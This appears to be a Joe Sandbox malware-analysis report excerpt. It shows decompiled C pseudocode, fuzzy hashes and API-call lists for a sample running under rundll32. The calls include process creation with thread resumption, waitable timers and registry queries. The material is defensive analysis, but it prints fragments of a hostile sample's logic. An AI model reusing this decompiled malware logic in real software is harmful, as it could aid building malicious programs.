                                                          • Opcode Fuzzy Hash: ac1e0b75224bfff75b51d28beab584eabc0336db60f942c72381f0595546712a
                                                          • Instruction Fuzzy Hash: F0324770A04615EFDF19DF58C480ABDBBB2FF84315F15819ADC56AB285EB70DA41CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E58055(long _a4) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				short* _v32;
                                                          				void _v36;
                                                          				void* _t57;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				signed int _t62;
                                                          				void* _t63;
                                                          				signed int* _t68;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr _t72;
                                                          				intOrPtr _t75;
                                                          				void* _t76;
                                                          				signed int _t77;
                                                          				void* _t78;
                                                          				void _t80;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				signed int _t86;
                                                          				short* _t87;
                                                          				void* _t89;
                                                          				signed int* _t90;
                                                          				long _t91;
                                                          				signed int _t93;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				void* _t104;
                                                          				long _t108;
                                                          				signed int _t110;
                                                          
                                                          				_t108 = _a4;
                                                          				_t76 =  *(_t108 + 8);
                                                          				if((_t76 & 0x00000003) != 0) {
                                                          					L3:
                                                          					return 0;
                                                          				}
                                                          				_a4 =  *[fs:0x4];
                                                          				_v8 =  *[fs:0x8];
                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                          					_t102 =  *(_t108 + 0xc);
                                                          					__eflags = _t102 - 0xffffffff;
                                                          					if(_t102 != 0xffffffff) {
                                                          						_t91 = 0;
                                                          						__eflags = 0;
                                                          						_a4 = 0;
                                                          						_t57 = _t76;
                                                          						do {
                                                          							_t80 =  *_t57;
                                                          							__eflags = _t80 - 0xffffffff;
                                                          							if(_t80 == 0xffffffff) {
                                                          								goto L9;
                                                          							}
                                                          							__eflags = _t80 - _t91;
                                                          							if(_t80 >= _t91) {
                                                          								L20:
                                                          								_t63 = 0;
                                                          								L60:
                                                          								return _t63;
                                                          							}
                                                          							L9:
                                                          							__eflags =  *(_t57 + 4);
                                                          							if( *(_t57 + 4) != 0) {
                                                          								_t12 =  &_a4;
                                                          								 *_t12 = _a4 + 1;
                                                          								__eflags =  *_t12;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							_t57 = _t57 + 0xc;
                                                          							__eflags = _t91 - _t102;
                                                          						} while (_t91 <= _t102);
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L15:
                                                          							_t81 =  *0xe5a330; // 0x0
                                                          							_t110 = _t76 & 0xfffff000;
                                                          							_t58 = 0;
                                                          							__eflags = _t81;
                                                          							if(_t81 <= 0) {
                                                          								L18:
                                                          								_t104 = _t102 | 0xffffffff;
                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                          								__eflags = _t61;
                                                          								if(_t61 < 0) {
                                                          									_t62 = 0;
                                                          									__eflags = 0;
                                                          								} else {
                                                          									_t62 = _a4;
                                                          								}
                                                          								__eflags = _t62;
                                                          								if(_t62 == 0) {
                                                          									L59:
                                                          									_t63 = _t104;
                                                          									goto L60;
                                                          								} else {
                                                          									__eflags = _v12 - 0x1000000;
                                                          									if(_v12 != 0x1000000) {
                                                          										goto L59;
                                                          									}
                                                          									__eflags = _v16 & 0x000000cc;
                                                          									if((_v16 & 0x000000cc) == 0) {
                                                          										L46:
                                                          										_t63 = 1;
                                                          										 *0xe5a378 = 1;
                                                          										__eflags =  *0xe5a378;
                                                          										if( *0xe5a378 != 0) {
                                                          											goto L60;
                                                          										}
                                                          										_t84 =  *0xe5a330; // 0x0
                                                          										__eflags = _t84;
                                                          										_t93 = _t84;
                                                          										if(_t84 <= 0) {
                                                          											L51:
                                                          											__eflags = _t93;
                                                          											if(_t93 != 0) {
                                                          												L58:
                                                          												 *0xe5a378 = 0;
                                                          												goto L5;
                                                          											}
                                                          											_t77 = 0xf;
                                                          											__eflags = _t84 - _t77;
                                                          											if(_t84 <= _t77) {
                                                          												_t77 = _t84;
                                                          											}
                                                          											_t94 = 0;
                                                          											__eflags = _t77;
                                                          											if(_t77 < 0) {
                                                          												L56:
                                                          												__eflags = _t84 - 0x10;
                                                          												if(_t84 < 0x10) {
                                                          													_t86 = _t84 + 1;
                                                          													__eflags = _t86;
                                                          													 *0xe5a330 = _t86;
                                                          												}
                                                          												goto L58;
                                                          											} else {
                                                          												do {
                                                          													_t68 = 0xe5a338 + _t94 * 4;
                                                          													_t94 = _t94 + 1;
                                                          													__eflags = _t94 - _t77;
                                                          													 *_t68 = _t110;
                                                          													_t110 =  *_t68;
                                                          												} while (_t94 <= _t77);
                                                          												goto L56;
                                                          											}
                                                          										}
                                                          										_t69 = 0xe5a334 + _t84 * 4;
                                                          										while(1) {
                                                          											__eflags =  *_t69 - _t110;
                                                          											if( *_t69 == _t110) {
                                                          												goto L51;
                                                          											}
                                                          											_t93 = _t93 - 1;
                                                          											_t69 = _t69 - 4;
                                                          											__eflags = _t93;
                                                          											if(_t93 > 0) {
                                                          												continue;
                                                          											}
                                                          											goto L51;
                                                          										}
                                                          										goto L51;
                                                          									}
                                                          									_t87 = _v32;
                                                          									__eflags =  *_t87 - 0x5a4d;
                                                          									if( *_t87 != 0x5a4d) {
                                                          										goto L59;
                                                          									}
                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                          									__eflags =  *_t71 - 0x4550;
                                                          									if( *_t71 != 0x4550) {
                                                          										goto L59;
                                                          									}
                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                          										goto L59;
                                                          									}
                                                          									_t78 = _t76 - _t87;
                                                          									__eflags =  *((short*)(_t71 + 6));
                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                          										goto L59;
                                                          									}
                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                          									__eflags = _t78 - _t72;
                                                          									if(_t78 < _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                          										goto L46;
                                                          									}
                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                          										goto L20;
                                                          									}
                                                          									goto L46;
                                                          								}
                                                          							} else {
                                                          								goto L16;
                                                          							}
                                                          							while(1) {
                                                          								L16:
                                                          								__eflags =  *((intOrPtr*)(0xe5a338 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0xe5a338 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 + 1;
                                                          								__eflags = _t58 - _t81;
                                                          								if(_t58 < _t81) {
                                                          									continue;
                                                          								}
                                                          								goto L18;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(_t58 <= 0) {
                                                          								goto L5;
                                                          							}
                                                          							 *0xe5a378 = 1;
                                                          							__eflags =  *0xe5a378;
                                                          							if( *0xe5a378 != 0) {
                                                          								goto L5;
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(0xe5a338 + _t58 * 4)) - _t110;
                                                          							if( *((intOrPtr*)(0xe5a338 + _t58 * 4)) == _t110) {
                                                          								L32:
                                                          								_t100 = 0;
                                                          								__eflags = _t58;
                                                          								if(_t58 < 0) {
                                                          									L34:
                                                          									 *0xe5a378 = 0;
                                                          									goto L5;
                                                          								} else {
                                                          									goto L33;
                                                          								}
                                                          								do {
                                                          									L33:
                                                          									_t90 = 0xe5a338 + _t100 * 4;
                                                          									_t100 = _t100 + 1;
                                                          									__eflags = _t100 - _t58;
                                                          									 *_t90 = _t110;
                                                          									_t110 =  *_t90;
                                                          								} while (_t100 <= _t58);
                                                          								goto L34;
                                                          							}
                                                          							_t25 = _t81 - 1; // -1
                                                          							_t58 = _t25;
                                                          							__eflags = _t58;
                                                          							if(_t58 < 0) {
                                                          								L28:
                                                          								__eflags = _t81 - 0x10;
                                                          								if(_t81 < 0x10) {
                                                          									_t81 = _t81 + 1;
                                                          									__eflags = _t81;
                                                          									 *0xe5a330 = _t81;
                                                          								}
                                                          								_t28 = _t81 - 1; // 0x0
                                                          								_t58 = _t28;
                                                          								goto L32;
                                                          							} else {
                                                          								goto L25;
                                                          							}
                                                          							while(1) {
                                                          								L25:
                                                          								__eflags =  *((intOrPtr*)(0xe5a338 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0xe5a338 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 - 1;
                                                          								__eflags = _t58;
                                                          								if(_t58 >= 0) {
                                                          									continue;
                                                          								}
                                                          								break;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(__eflags >= 0) {
                                                          								if(__eflags == 0) {
                                                          									goto L34;
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							goto L28;
                                                          						}
                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                          						__eflags = _t75 - _v8;
                                                          						if(_t75 < _v8) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t75 - _t108;
                                                          						if(_t75 >= _t108) {
                                                          							goto L20;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					L5:
                                                          					_t63 = 1;
                                                          					goto L60;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}
                                                          0x00000000
                                                          0x00e580f0
                                                          0x00e580f1
                                                          0x00e580f3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580f3
                                                          0x00e5811b
                                                          0x00e5811d
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5812d
                                                          0x00e5812f
                                                          0x00e58131
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58137
                                                          0x00e5813e
                                                          0x00e5816a
                                                          0x00e5816a
                                                          0x00e5816c
                                                          0x00e5816e
                                                          0x00e58182
                                                          0x00e58184
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58170
                                                          0x00e58170
                                                          0x00e58170
                                                          0x00e58179
                                                          0x00e5817a
                                                          0x00e5817c
                                                          0x00e5817e
                                                          0x00e5817e
                                                          0x00000000
                                                          0x00e58170
                                                          0x00e58140
                                                          0x00e58140
                                                          0x00e58143
                                                          0x00e58145
                                                          0x00e58157
                                                          0x00e58157
                                                          0x00e5815a
                                                          0x00e5815c
                                                          0x00e5815c
                                                          0x00e5815d
                                                          0x00e5815d
                                                          0x00e58163
                                                          0x00e58163
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58147
                                                          0x00e58147
                                                          0x00e58147
                                                          0x00e5814e
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58150
                                                          0x00e58150
                                                          0x00e58151
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58151
                                                          0x00e58153
                                                          0x00e58155
                                                          0x00e58168
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e58168
                                                          0x00000000
                                                          0x00e58155
                                                          0x00e580c7
                                                          0x00e580ca
                                                          0x00e580cd
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580cf
                                                          0x00e580d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e580d1
                                                          0x00e58096
                                                          0x00e58098
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00E58106
Memory Dump Source
• Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
• Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
• Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
• Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: 2a3c63ad64298020ad65f5d0142a7a2e6161dcfaa89c2163f5205df75c2c4255
• Instruction ID: 92720c07b078492fe65f0679fea6bc88685210243bb28cd33c89b2d8af8eb43b
• Opcode Fuzzy Hash: 2a3c63ad64298020ad65f5d0142a7a2e6161dcfaa89c2163f5205df75c2c4255
• Instruction Fuzzy Hash: 5461C134601A018FDB19CA29CB8066937A1EB8575AF28AD79DC51F71A4EF31DC4ECB41
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: d0a0e0cde52bd109f763a167a65e7fb4e3902e3ac975bba4493eea9d592311f4
• Instruction ID: 7ee7f12e808f3e0065af198118d5e0aaaafcefad1f3bc9af085e434ba8f095be
• Opcode Fuzzy Hash: d0a0e0cde52bd109f763a167a65e7fb4e3902e3ac975bba4493eea9d592311f4
• Instruction Fuzzy Hash: 5FD18E30A0425EDFCF18CFA8E4905BEBBB2FF85314F24856DD85697240E7709A55CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0557E6EE
  • Part of subcall function 0557CC84: ResumeThread.KERNEL32(00000004,?,0557CD20,?), ref: 0557CC99
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: CreateProcessResumeThreadUser
• String ID:
• API String ID: 3393100766-0
• Opcode ID: 82f22ed160320ce1ca2291d60a4478fdf13bb5541afd26eec8e2b8cec86bb3a2
• Instruction ID: 412e309372cdb6f769215d8e18df812a5170e2101e910f2edacdc7de2fea6c15
• Opcode Fuzzy Hash: 82f22ed160320ce1ca2291d60a4478fdf13bb5541afd26eec8e2b8cec86bb3a2
• Instruction Fuzzy Hash: 54F0FF32215149AF9F024E99EC41CDA7FAAFF49374B054225F91992120C736DC25AB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlNtStatusToDosError.NTDLL(00000000), ref: 05579D4E
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: ErrorStatus
• String ID:
• API String ID: 1596131371-0
• Opcode ID: 45b89ec5bb0bd95d821676aa4fb23ed622d10b9620911b2c702a82ed1824f23a
• Instruction ID: 86004b1b2845df20dd34726f0a03b9d3bbf4f973f775d8b2ac5b5cf09be6365a
• Opcode Fuzzy Hash: 45b89ec5bb0bd95d821676aa4fb23ed622d10b9620911b2c702a82ed1824f23a
• Instruction Fuzzy Hash: 08C012316082016FEF185B50E81EE3A7F25FB50740F01441DB14984070DF789858D711
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 963d91cf9419add5775c214a8614ac0b13b9a4e7845549bd75c310309692ba8e
• Instruction ID: 06486eda51dd8ed1d71101705771b572a7386228bf7552f34e160a7fc15cc4d7
• Opcode Fuzzy Hash: 963d91cf9419add5775c214a8614ac0b13b9a4e7845549bd75c310309692ba8e
• Instruction Fuzzy Hash: 4A424971E14219EBCF18DF98C5906BCBBF2FF84305F14819AD852AB285E7749A40DF90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
• Instruction ID: aaf863e51f8e983af449b5927bc3f8a1e9789891800f36d7c901ae75caf5c79d
• Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
• Instruction Fuzzy Hash: B2F15530A18649EBCB0CCFA9D0A08BDBBB2FF89314B24C19EE49667745CB355A45CF54
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: 170b8e373d3bb8607a78ccf5335a13f551790139923378a44a186d34c58fe2e1
• Instruction ID: 39df62a4dee65e4f26d90c086b3572506db680d4ed4ddc5f754c8891bf632524
• Opcode Fuzzy Hash: 170b8e373d3bb8607a78ccf5335a13f551790139923378a44a186d34c58fe2e1
• Instruction Fuzzy Hash: 75C1FE35604B498FD725DF29D8809A6B3E2FF88304B54492ED9D78BB61D735F846CB04
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
• Instruction ID: f46a9978c45aedc31efeb41548280b1539bf44730860d45bd8f843ed05ddc486
• Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
• Instruction Fuzzy Hash: AC21F8729002049FCF19EF68D8C49BBB7A5FF84310B098168DD5A8B245E734F925CBE0
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 71%
E00E57E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
	intOrPtr _v8;
	char _v12;
	void* __ebp;
	signed int* _t43;
	char _t44;
	void* _t46;
	void* _t49;
	intOrPtr* _t53;
	void* _t54;
	void* _t55;	/* declaration was missing in the decompiler output; used below */
	void* _t65;
	long _t66;
	signed int* _t80;
	signed int* _t82;
	void* _t84;
	signed int _t86;
	void* _t89;
	void* _t95;
	void* _t96;
	void* _t99;
	void* _t106;

	_t43 = _t84;
	_t65 = __ebx + 2;
	 *_t43 =  *_t43 ^ __edx ^  *__eax;
	_t89 = _t95;
	_t96 = _t95 - 8;
	_push(_t65);
	_push(_t84);
	_push(_t89);
	asm("cld");
	_t66 = _a8;
	_t44 = _a4;
	if(( *(_t44 + 4) & 0x00000006) != 0) {
		_push(_t89);
		E00E57F9B(_t66 + 0x10, _t66, 0xffffffff);
		_t46 = 1;
	} else {
		_v12 = _t44;
		_v8 = _a12;
		 *((intOrPtr*)(_t66 - 4)) =  &_v12;
		_t86 =  *(_t66 + 0xc);
		_t80 =  *(_t66 + 8);
		_t49 = E00E58055(_t66);
		_t99 = _t96 + 4;
		if(_t49 == 0) {
			 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
			goto L11;
		} else {
			while(_t86 != 0xffffffff) {
				_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
				if(_t53 == 0) {
					L8:
					_t80 =  *(_t66 + 8);
					_t86 = _t80[_t86 + _t86 * 2];
					continue;
				} else {
					_t54 =  *_t53();
					_t89 = _t89;
					_t86 = _t86;
					_t66 = _a8;
					_t55 = _t54;
					_t106 = _t54;
					if(_t106 == 0) {
						goto L8;
					} else {
						if(_t106 < 0) {
							_t46 = 0;
						} else {
							_t82 =  *(_t66 + 8);
							E00E57F40(_t55, _t66);
							_t89 = _t66 + 0x10;
							E00E57F9B(_t89, _t66, 0);
							_t99 = _t99 + 0xc;
							E00E58037(_t82[2]);
							 *(_t66 + 0xc) =  *_t82;
							_t66 = 0;
							_t86 = 0;
							 *(_t82[2])(1);
							goto L8;
						}
					}
				}
				goto L13;
			}
			L11:
			_t46 = 1;
		}
	}
	L13:
	return _t46;
}

                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction ID: c5321192d4fb17e75018ab526eaf324f1085af09e51171a8465e80e4f82c9e0f
                                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction Fuzzy Hash: 6121B6329042049FCB14EF68DCC19ABB7A5FF44350B0589A9ED55AB245DB30FD29C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0559209C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 055920D0
                                                            • Part of subcall function 0559209C: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05592191
                                                            • Part of subcall function 0559209C: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0559219A
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 0558CE57
                                                            • Part of subcall function 05581DB7: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05581DD1
                                                            • Part of subcall function 05581DB7: CreateWaitableTimerA.KERNEL32(0559C1A8,00000001,?), ref: 05581DEE
                                                            • Part of subcall function 05581DB7: GetLastError.KERNEL32(?,00000000,05587801,00000000,00000000,00008008,?,?,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05581DFF
                                                            • Part of subcall function 05581DB7: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E3F
                                                            • Part of subcall function 05581DB7: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E5E
                                                            • Part of subcall function 05581DB7: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E74
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 0558CEBA
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0558CF37
                                                          • WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 0558CFDC
                                                            • Part of subcall function 0558B922: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0558B944
                                                            • Part of subcall function 0558B922: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 0558B972
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D011
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D020
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0558D04D
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0558D067
                                                          • _allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 0558D0AF
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 0558D0C9
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0558D0DF
                                                          • ReleaseMutex.KERNEL32(?), ref: 0558D0FC
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D10D
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D11C
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0558D150
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0558D16A
                                                          • SwitchToThread.KERNEL32 ref: 0558D16C
                                                          • ReleaseMutex.KERNEL32(?), ref: 0558D176
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D1B4
                                                            • Part of subcall function 0558FA96: RegOpenKeyA.ADVAPI32(80000001,?,7519F710), ref: 0558FAB4
                                                            • Part of subcall function 0558FA96: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0558FAE2
                                                            • Part of subcall function 0558FA96: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0558FAF4
                                                            • Part of subcall function 0558FA96: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0558FB19
                                                            • Part of subcall function 0558FA96: HeapFree.KERNEL32(00000000,00000000), ref: 0558FB34
                                                            • Part of subcall function 0558FA96: RegCloseKey.ADVAPI32(?), ref: 0558FB3E
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D1BF
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0558D1E2
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0558D1FC
                                                          • SwitchToThread.KERNEL32 ref: 0558D1FE
                                                          • ReleaseMutex.KERNEL32(?), ref: 0558D208
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D21D
                                                          • CloseHandle.KERNEL32(?), ref: 0558D26B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D27F
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D28B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D297
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2A3
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2AF
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2BB
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2C7
                                                          • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0558D2D6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
                                                          • String ID:
                                                          • API String ID: 3804754466-0
                                                          • Opcode ID: 3010cb77f682a488b5734782d7acf0a369482b99ff17f7419b0d5fc7498fe420
                                                          • Instruction ID: 33b646b57ceba7626ee61ef78674e79ad8979413be91909edaecb521575d2b2c
                                                          • Opcode Fuzzy Hash: 3010cb77f682a488b5734782d7acf0a369482b99ff17f7419b0d5fc7498fe420
                                                          • Instruction Fuzzy Hash: 27E1A271518305AFDB11BFA4DC85D7ABBF9FB84360F010A2EF595A21A0EB35DC089B52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0558195A
                                                          • GetTickCount.KERNEL32 ref: 05581974
                                                          • wsprintfA.USER32 ref: 055819C7
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 055819D3
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 055819DE
                                                          • _aulldiv.NTDLL(?,?,?,?), ref: 055819F4
                                                          • wsprintfA.USER32 ref: 05581A0A
                                                          • wsprintfA.USER32 ref: 05581A28
                                                          • wsprintfA.USER32 ref: 05581A3F
                                                          • wsprintfA.USER32 ref: 05581A60
                                                          • wsprintfA.USER32 ref: 05581A9B
                                                          • wsprintfA.USER32 ref: 05581ABF
                                                          • lstrcat.KERNEL32(?,?), ref: 05581AF7
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05581B11
                                                          • GetTickCount.KERNEL32 ref: 05581B21
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05581B35
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05581B53
                                                          • StrTrimA.SHLWAPI(00000000,055963D8,00000000,059BB188), ref: 05581B88
